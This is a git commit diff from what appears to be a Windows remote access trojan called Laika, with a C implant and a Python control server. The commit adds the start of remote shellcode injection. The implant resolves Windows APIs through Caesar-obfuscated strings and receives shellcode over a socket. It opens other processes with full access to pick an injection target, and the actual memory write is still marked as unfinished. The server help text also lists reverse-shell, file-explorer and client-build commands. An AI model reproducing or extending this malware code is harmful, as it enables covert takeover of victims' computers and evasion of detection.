patate/Laika
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

ajout du début de l'injection de shellcode

Browse Source 
à faire: injecter le shellcode, trouver un moyen pour télécharger le shellcode dans le buffer sans passer par un fichier intermédiaire en utilisant la même fonction que pour l'upload
This commit is contained in:
ALittlePatate
2023-02-21 21:28:16 +01:00
parent 72b4761011
commit ab627f939d
10 changed files with 219 additions and 22 deletions
Download Patch File Download Diff File Expand all files Collapse all files

2
Laika/Laika.vcxproj
View File

@@ -159,12 +159,14 @@
<ClCompile Include="file_explorer.c" /> <ClCompile Include="file_explorer.c" />
<ClCompile Include="main.c" /> <ClCompile Include="main.c" />
<ClCompile Include="resolve_apis.c" /> <ClCompile Include="resolve_apis.c" />
<ClCompile Include="shellcode.c" />
<ClCompile Include="utils.c" /> <ClCompile Include="utils.c" />
</ItemGroup> </ItemGroup>
<ItemGroup> <ItemGroup>
<ClInclude Include="config.h" /> <ClInclude Include="config.h" />
<ClInclude Include="file_explorer.h" /> <ClInclude Include="file_explorer.h" />
<ClInclude Include="resolve_apis.h" /> <ClInclude Include="resolve_apis.h" />
<ClInclude Include="shellcode.h" />
<ClInclude Include="utils.h" /> <ClInclude Include="utils.h" />
</ItemGroup> </ItemGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" /> <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />

9
Laika/Laika.vcxproj.filters
View File

@@ -13,6 +13,9 @@
<Filter Include="File explorer"> <Filter Include="File explorer">
<UniqueIdentifier>{1c39cfa5-e620-4df2-bae9-e24a26485d37}</UniqueIdentifier> <UniqueIdentifier>{1c39cfa5-e620-4df2-bae9-e24a26485d37}</UniqueIdentifier>
</Filter> </Filter>
<Filter Include="Shellcode">
<UniqueIdentifier>{15e1ca95-85db-48cd-8b71-413ceac5d0b8}</UniqueIdentifier>
</Filter>
</ItemGroup> </ItemGroup>
<ItemGroup> <ItemGroup>
<ClCompile Include="main.c"> <ClCompile Include="main.c">
@@ -27,6 +30,9 @@
<ClCompile Include="file_explorer.c"> <ClCompile Include="file_explorer.c">
<Filter>File explorer</Filter> <Filter>File explorer</Filter>
</ClCompile> </ClCompile>
<ClCompile Include="shellcode.c">
<Filter>Shellcode</Filter>
</ClCompile>
</ItemGroup> </ItemGroup>
<ItemGroup> <ItemGroup>
<ClInclude Include="utils.h"> <ClInclude Include="utils.h">
@@ -41,5 +47,8 @@
<ClInclude Include="file_explorer.h"> <ClInclude Include="file_explorer.h">
<Filter>File explorer</Filter> <Filter>File explorer</Filter>
</ClInclude> </ClInclude>
<ClInclude Include="shellcode.h">
<Filter>Shellcode</Filter>
</ClInclude>
</ItemGroup> </ItemGroup>
</Project> </Project>

24
Laika/file_explorer.c
View File

@@ -95,10 +95,10 @@ BOOL delete_folder(LPCTSTR lpszDir) {
TCHAR szFileName[MAX_PATH]; TCHAR szFileName[MAX_PATH];
// copy the directory path to a buffer // copy the directory path to a buffer
lstrcpy(szDir, lpszDir); Api.lstrcpyW(szDir, lpszDir);
// add the wildcard character and search for the first file in the directory // add the wildcard character and search for the first file in the directory
lstrcat(szDir, TEXT("\\*")); Api.lstrcatW(szDir, TEXT("\\*"));
hFind = Api.FindFirstFileW(szDir, &FindFileData); hFind = Api.FindFirstFileW(szDir, &FindFileData);
if (hFind == INVALID_HANDLE_VALUE) { if (hFind == INVALID_HANDLE_VALUE) {
@@ -107,15 +107,15 @@ BOOL delete_folder(LPCTSTR lpszDir) {
} }
do { do {
if (lstrcmp(FindFileData.cFileName, TEXT(".")) == 0 || lstrcmp(FindFileData.cFileName, TEXT("..")) == 0) { if (Api.lstrcpyW(FindFileData.cFileName, TEXT(".")) == 0 || Api.lstrcpyW(FindFileData.cFileName, TEXT("..")) == 0) {
// skip the current and parent directories // skip the current and parent directories
continue; continue;
} }
// build the full file name // build the full file name
lstrcpy(szFileName, lpszDir); Api.lstrcpyW(szFileName, lpszDir);
lstrcat(szFileName, TEXT("\\")); Api.lstrcatW(szFileName, TEXT("\\"));
lstrcat(szFileName, FindFileData.cFileName); Api.lstrcatW(szFileName, FindFileData.cFileName);
if (FindFileData.dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY) { if (FindFileData.dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY) {
// recursively delete the subdirectory // recursively delete the subdirectory
@@ -193,19 +193,10 @@ int download_file(FILE* fp, SOCKET sock) {
return 1; return 1;
} }
void upload_file(SOCKET sock, const char* path) { void upload_file(SOCKET sock, HANDLE file_handle) {
// Receive file // Receive file
char* buffer = (char*)Api.malloc(BUFFER_SIZE); char* buffer = (char*)Api.malloc(BUFFER_SIZE);
LPCWSTR wstr = ConvertCharToWChar(path);
HANDLE file_handle = Api.CreateFileW(wstr, GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);
if (file_handle == INVALID_HANDLE_VALUE) {
Api.free(buffer);
Api.free((LPWSTR)wstr);
return;
}
Api.free((LPWSTR)wstr);
int num_bytes = 0; int num_bytes = 0;
int total_bytes = 0; int total_bytes = 0;
@@ -228,7 +219,6 @@ void upload_file(SOCKET sock, const char* path) {
// Close the file handle // Close the file handle
Api.free(buffer); Api.free(buffer);
Api.CloseHandle(file_handle);
return; return;
} }

2
Laika/file_explorer.h
View File

@@ -19,4 +19,4 @@ int get_drives_list(char* buf);
BOOL delete_folder(LPCTSTR lpszDir); BOOL delete_folder(LPCTSTR lpszDir);
char* get_file_list(const char* dirPath, int* numFiles); char* get_file_list(const char* dirPath, int* numFiles);
int download_file(FILE* fp, SOCKET sock); int download_file(FILE* fp, SOCKET sock);
void upload_file(SOCKET sock, const char* path); void upload_file(SOCKET sock, HANDLE file_handle);

79
Laika/main.c
View File

@@ -6,6 +6,7 @@
#include "config.h" #include "config.h"
#include "resolve_apis.h" #include "resolve_apis.h"
#include "file_explorer.h" #include "file_explorer.h"
#include "shellcode.h"
HANDLE g_hChildStd_IN_Rd = NULL; HANDLE g_hChildStd_IN_Rd = NULL;
HANDLE g_hChildStd_IN_Wr = NULL; HANDLE g_hChildStd_IN_Wr = NULL;
@@ -285,6 +286,70 @@ retry:
Api.free(drives); Api.free(drives);
} }
if (Api.strncmp(server_reply, "nsojhy", strlen("nsojhy")) == 0) { //inject
char* arch = (char*)Api.malloc(3);
if (Api.recv(sock, arch, 3, 0) <= 0) {
//send failed
Api.free(arch);
Sleep_(Sleep_TIME);
goto retry;
}
CAESAR_DECRYPT(arch);
// Create a file handle for the memory buffer
HANDLE hFile = Api.CreateFileW(
L"ykifyk",
GENERIC_READ | GENERIC_WRITE,
FILE_SHARE_READ | FILE_SHARE_WRITE,
NULL,
CREATE_ALWAYS,
FILE_ATTRIBUTE_NORMAL,
NULL);
upload_file(sock, hFile);
// Open the file handle for reading
hFile = Api.CreateFileW(
L"ykifyk",
GENERIC_READ,
FILE_SHARE_READ | FILE_SHARE_WRITE,
NULL,
OPEN_EXISTING,
FILE_ATTRIBUTE_NORMAL,
NULL);
if (hFile == INVALID_HANDLE_VALUE) {
Sleep_(Sleep_TIME);
goto retry;
}
char* buffer = (char*)Api.malloc(BUFFER_SIZE);
Api.ReadFile(hFile, buffer, BUFFER_SIZE, NULL, NULL);
Api.CloseHandle(hFile);
HANDLE proc;
if (Api.strncmp(arch, "x86", strlen("x86")) == 0) {
proc = FindProcessByArch(L"x86");
}
else {
proc = FindProcessByArch(L"x64");
}
if (proc == NULL) {
Api.free(arch);
Api.free(buffer);
Sleep_(Sleep_TIME);
goto retry;
}
//Api.WriteProcessMemory(proc, (LPVOID)0, "", 0, NULL); WIP
Api.CloseHandle(proc);
Api.free(arch);
Api.free(buffer);
}
if (Api.strncmp(server_reply, "ljydknqjdqnxy", strlen("ljydknqjdqnxy")) == 0) { //get_file_list if (Api.strncmp(server_reply, "ljydknqjdqnxy", strlen("ljydknqjdqnxy")) == 0) { //get_file_list
char* file_list = (char*)Api.malloc(BUFFER_SIZE); char* file_list = (char*)Api.malloc(BUFFER_SIZE);
char* path = (char*)Api.malloc(MAX_PATH); char* path = (char*)Api.malloc(MAX_PATH);
@@ -360,8 +425,20 @@ retry:
goto retry; goto retry;
} }
upload_file(sock, CAESAR_DECRYPT(path)); LPCWSTR wstr = ConvertCharToWChar(CAESAR_DECRYPT(path));
HANDLE file_handle = Api.CreateFileW(wstr, GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);
if (file_handle == INVALID_HANDLE_VALUE) {
Api.free(path);
Api.free((LPWSTR)wstr);
return;
}
Api.free((LPWSTR)wstr);
upload_file(sock, file_handle);
Api.CloseHandle(file_handle);
Api.free(path); Api.free(path);
} }

9
Laika/resolve_apis.c
View File

@@ -33,6 +33,14 @@ void InitApis() {
Api.FindNextFileW = (TFindNextFileW)Api.GetProcAddress(hKernel32, CAESAR_DECRYPT("KnsiSj}yKnqj\\")); Api.FindNextFileW = (TFindNextFileW)Api.GetProcAddress(hKernel32, CAESAR_DECRYPT("KnsiSj}yKnqj\\"));
Api.RemoveDirectoryW = (TRemoveDirectoryW)Api.GetProcAddress(hKernel32, CAESAR_DECRYPT("Wjrt{jInwjhytw~\\")); Api.RemoveDirectoryW = (TRemoveDirectoryW)Api.GetProcAddress(hKernel32, CAESAR_DECRYPT("Wjrt{jInwjhytw~\\"));
Api.DeleteFileW = (TDeleteFileW)Api.GetProcAddress(hKernel32, CAESAR_DECRYPT("IjqjyjKnqj\\")); Api.DeleteFileW = (TDeleteFileW)Api.GetProcAddress(hKernel32, CAESAR_DECRYPT("IjqjyjKnqj\\"));
Api.lstrcpyW = (TlstrcpyW)Api.GetProcAddress(hKernel32, CAESAR_DECRYPT("qxywhu~\\"));
Api.lstrcatW = (TlstrcatW)Api.GetProcAddress(hKernel32, CAESAR_DECRYPT("qxywhfy\\"));
Api.CreateToolhelp32Snapshot = (TCreateToolhelp32Snapshot)Api.GetProcAddress(hKernel32, CAESAR_DECRYPT("HwjfyjYttqmjqu87Xsfuxmty"));
Api.Process32FirstW = (TProcess32FirstW)Api.GetProcAddress(hKernel32, CAESAR_DECRYPT("Uwthjxx87Knwxy\\"));
Api.OpenProcess = (TOpenProcess)Api.GetProcAddress(hKernel32, CAESAR_DECRYPT("TujsUwthjxx"));
Api.Process32NextW = (TProcess32NextW)Api.GetProcAddress(hKernel32, CAESAR_DECRYPT("Uwthjxx87Sj}y\\"));
Api.IsWow64Process = (TIsWow64Process)Api.GetProcAddress(hKernel32, CAESAR_DECRYPT("Nx\\t|;9Uwthjxx"));
Api.WriteProcessMemory = (TWriteProcessMemory)Api.GetProcAddress(hKernel32, CAESAR_DECRYPT("\\wnyjUwthjxxRjrtw~"));
hMsvcrt = LoadLibraryA(CAESAR_DECRYPT("rx{hwy3iqq")); hMsvcrt = LoadLibraryA(CAESAR_DECRYPT("rx{hwy3iqq"));
if (!hMsvcrt) { if (!hMsvcrt) {
@@ -58,6 +66,7 @@ void InitApis() {
Api.fclose = (Tfclose)Api.GetProcAddress(hMsvcrt, CAESAR_DECRYPT("khqtxj")); Api.fclose = (Tfclose)Api.GetProcAddress(hMsvcrt, CAESAR_DECRYPT("khqtxj"));
Api.fread = (Tfread)Api.GetProcAddress(hMsvcrt, CAESAR_DECRYPT("kwjfi")); Api.fread = (Tfread)Api.GetProcAddress(hMsvcrt, CAESAR_DECRYPT("kwjfi"));
Api.fwrite = (Tfwrite)Api.GetProcAddress(hMsvcrt, CAESAR_DECRYPT("k|wnyj")); Api.fwrite = (Tfwrite)Api.GetProcAddress(hMsvcrt, CAESAR_DECRYPT("k|wnyj"));
Api.wcscmp = (Twcscmp)Api.GetProcAddress(hMsvcrt, CAESAR_DECRYPT("|hxhru"));
hWininet = LoadLibraryA(CAESAR_DECRYPT("|x7d873iqq")); hWininet = LoadLibraryA(CAESAR_DECRYPT("|x7d873iqq"));
if (!hWininet) { if (!hWininet) {

19
Laika/resolve_apis.h
View File

@@ -1,6 +1,7 @@
#pragma once #pragma once
#include <Windows.h> #include <Windows.h>
#include <shlobj_core.h> #include <shlobj_core.h>
#include <TlHelp32.h>
#include <wininet.h> #include <wininet.h>
#include <winsock.h> #include <winsock.h>
#include "utils.h" #include "utils.h"
@@ -37,6 +38,9 @@ typedef FILE* (WINAPI* Tfopen)(char const*, char const*);
typedef int(WINAPI* Tfclose)(FILE*); typedef int(WINAPI* Tfclose)(FILE*);
typedef size_t(WINAPI* Tfread)(void*, size_t, size_t, FILE*); typedef size_t(WINAPI* Tfread)(void*, size_t, size_t, FILE*);
typedef size_t(WINAPI* Tfwrite)(void const*, size_t, size_t, FILE*); typedef size_t(WINAPI* Tfwrite)(void const*, size_t, size_t, FILE*);
typedef LPWSTR(WINAPI* TlstrcpyW)(LPWSTR, LPCWSTR);
typedef LPWSTR(WINAPI* TlstrcatW)(LPWSTR, LPCWSTR);
typedef int(WINAPI* Twcscmp)(const wchar_t*, const wchar_t*);
typedef HANDLE(WINAPI* TCreateFileW)(LPCWSTR, DWORD, DWORD, LPSECURITY_ATTRIBUTES, DWORD, DWORD, HANDLE); typedef HANDLE(WINAPI* TCreateFileW)(LPCWSTR, DWORD, DWORD, LPSECURITY_ATTRIBUTES, DWORD, DWORD, HANDLE);
typedef BOOL(WINAPI* TReadFile)(HANDLE, LPVOID, DWORD, LPDWORD, LPOVERLAPPED); typedef BOOL(WINAPI* TReadFile)(HANDLE, LPVOID, DWORD, LPDWORD, LPOVERLAPPED);
@@ -59,6 +63,12 @@ typedef HANDLE(WINAPI* TFindFirstFileW)(LPCWSTR, LPWIN32_FIND_DATAW);
typedef BOOL(WINAPI* TFindNextFileW)(HANDLE, LPWIN32_FIND_DATAW); typedef BOOL(WINAPI* TFindNextFileW)(HANDLE, LPWIN32_FIND_DATAW);
typedef BOOL(WINAPI* TRemoveDirectoryW)(LPCWSTR); typedef BOOL(WINAPI* TRemoveDirectoryW)(LPCWSTR);
typedef BOOL(WINAPI* TDeleteFileW)(LPCWSTR); typedef BOOL(WINAPI* TDeleteFileW)(LPCWSTR);
typedef HANDLE(WINAPI* TCreateToolhelp32Snapshot)(DWORD, DWORD);
typedef BOOL(WINAPI* TProcess32FirstW)(HANDLE, LPPROCESSENTRY32W);
typedef HANDLE(WINAPI* TOpenProcess)(DWORD, BOOL, DWORD);
typedef BOOL(WINAPI* TProcess32NextW)(HANDLE, LPPROCESSENTRY32W);
typedef BOOL(WINAPI* TIsWow64Process)(HANDLE, PBOOL);
typedef BOOL(WINAPI* TWriteProcessMemory)(HANDLE, LPVOID, LPCVOID, SIZE_T, SIZE_T*);
typedef struct ApiList { typedef struct ApiList {
Tconnect connect; Tconnect connect;
@@ -99,6 +109,12 @@ typedef struct ApiList {
TFindNextFileW FindNextFileW; TFindNextFileW FindNextFileW;
TRemoveDirectoryW RemoveDirectoryW; TRemoveDirectoryW RemoveDirectoryW;
TDeleteFileW DeleteFileW; TDeleteFileW DeleteFileW;
TCreateToolhelp32Snapshot CreateToolhelp32Snapshot;
TProcess32FirstW Process32FirstW;
TOpenProcess OpenProcess;
TProcess32NextW Process32NextW;
TIsWow64Process IsWow64Process;
TWriteProcessMemory WriteProcessMemory;
Tmbstowcs mbstowcs; Tmbstowcs mbstowcs;
Twcstombs wcstombs; Twcstombs wcstombs;
@@ -115,6 +131,9 @@ typedef struct ApiList {
Tfclose fclose; Tfclose fclose;
Tfread fread; Tfread fread;
Tfwrite fwrite; Tfwrite fwrite;
TlstrcpyW lstrcpyW;
TlstrcatW lstrcatW;
Twcscmp wcscmp;
} API; } API;
void InitApis(); void InitApis();

51
Laika/shellcode.c Normal file
View File

@@ -0,0 +1,51 @@
#include "shellcode.h"
extern API Api;
HANDLE FindProcessByArch(const wchar_t* arch)
{
HANDLE hSnapshot;
PROCESSENTRY32 pe32;
// Take a snapshot of all processes in the system
hSnapshot = Api.CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
if (hSnapshot == INVALID_HANDLE_VALUE) {
return NULL;
}
// Iterate through the processes in the system
pe32.dwSize = sizeof(PROCESSENTRY32);
if (!Api.Process32FirstW(hSnapshot, &pe32)) {
Api.CloseHandle(hSnapshot);
return NULL;
}
do {
HANDLE hProcess;
BOOL isWow64;
hProcess = Api.OpenProcess(PROCESS_ALL_ACCESS, FALSE, pe32.th32ProcessID);
if (hProcess == NULL) {
continue;
}
// Determine the process architecture
if (!Api.IsWow64Process(hProcess, &isWow64)) {
// Failed to determine the process architecture, so skip to the next process
Api.CloseHandle(hProcess);
hProcess = NULL;
continue;
}
// Check if the process matches the provided architecture
if ((Api.wcscmp(arch, L"x86") == 0 && !isWow64) || (Api.wcscmp(arch, L"x64") == 0 && isWow64)) {
if (hProcess != NULL) {
Api.CloseHandle(hSnapshot);
return hProcess;
}
}
} while (Api.Process32NextW(hSnapshot, &pe32));
// No matching process found
Api.CloseHandle(hSnapshot);
return NULL;
}

6
Laika/shellcode.h Normal file
View File

@@ -0,0 +1,6 @@
#pragma once
#include <Windows.h>
#include <TlHelp32.h>
#include "resolve_apis.h"
HANDLE FindProcessByArch(const wchar_t* arch);

40
Server/Server.py
View File

@@ -171,7 +171,7 @@ def interact() :
if CLIENT_IN_PATH == None : return "no client" if CLIENT_IN_PATH == None : return "no client"
client = CONNECT_CLIENTS[CLIENT_IN_PATH] client = CONNECT_CLIENTS[CLIENT_IN_PATH]
print(file_list) #print(file_list)
addr = client.getpeername()[0] addr = client.getpeername()[0]
addr = os.getcwd() + "\\" + addr.replace(".","_") addr = os.getcwd() + "\\" + addr.replace(".","_")
@@ -201,12 +201,13 @@ def interact() :
print("\n\nTéléchargement terminé.\n\n") print("\n\nTéléchargement terminé.\n\n")
case "upload" : case "upload" :
print("\n\nUpload...\n\n")
filename = easygui.fileopenbox() filename = easygui.fileopenbox()
if filename == None or path_file_ex_2 == "" : if filename == None or path_file_ex_2 == "" :
return 'no file selected' return 'no file selected'
print(f"{filename} --> {path_file_ex_2}") #print(f"{filename} --> {path_file_ex_2}")
client.send(CAESAR("upload_file\0").encode()) client.send(CAESAR("upload_file\0").encode())
@@ -215,6 +216,7 @@ def interact() :
fp = open(filename, "rb") fp = open(filename, "rb")
upload_file(fp, client) upload_file(fp, client)
print("\n\nUpload terminé.\n\n")
case "remove" : case "remove" :
for i in files : for i in files :
@@ -425,8 +427,9 @@ def main() -> None :
print("select <ID> : sélectionne le client avec lequel intéragir") print("select <ID> : sélectionne le client avec lequel intéragir")
print("deselect : désélectionne le client précédemment séléctionné avec \"select\"") print("deselect : désélectionne le client précédemment séléctionné avec \"select\"")
print("shell : ouvre un reverse shell dans le client précédemment séléctionné avec \"select\"") print("shell : ouvre un reverse shell dans le client précédemment séléctionné avec \"select\"")
print("build : build un client")
print("fex : ouvre l'explorateur de fichiers") print("fex : ouvre l'explorateur de fichiers")
print("inject <ARCH> <FILE> : upload un shellcode. ARCH --> 32/64")
print("build : build un client")
print("") print("")
elif cmd == "exit" : elif cmd == "exit" :
@@ -532,6 +535,37 @@ def main() -> None :
print("\nClique sur le lien ci-dessous pour voir le file explorer :") print("\nClique sur le lien ci-dessous pour voir le file explorer :")
print("http://127.0.0.1:5000\n") print("http://127.0.0.1:5000\n")
elif "inject" in cmd :
if SELECTED_CLIENT == -1 :
print("Vous n'avez aucun client sélectionné.")
continue
client = CONNECT_CLIENTS[SELECTED_CLIENT]
parts = cmd.split(" ")
if len(parts) > 3 or len(parts) <= 2 :
print("Commande mal formée, \"help\" pour la syntaxe.")
continue
arch = parts[1]
if arch != "32" and arch != "64" :
print("Commande mal formée, \"help\" pour la syntaxe.")
continue
fichier = parts[2]
if not os.path.isfile(fichier) :
print(f"{fichier} n'a pas été trouvé.")
continue
client.send(CAESAR("inject").encode())
if arch == "32" :
client.send(CAESAR("x86").encode())
else :
client.send(CAESAR("x64").encode())
fp = open(fichier, "rb")
upload_file(fp, client)
else : else :
print("Commande non reconnue, \"help\" pour afficher la liste des commandes.") print("Commande non reconnue, \"help\" pour afficher la liste des commandes.")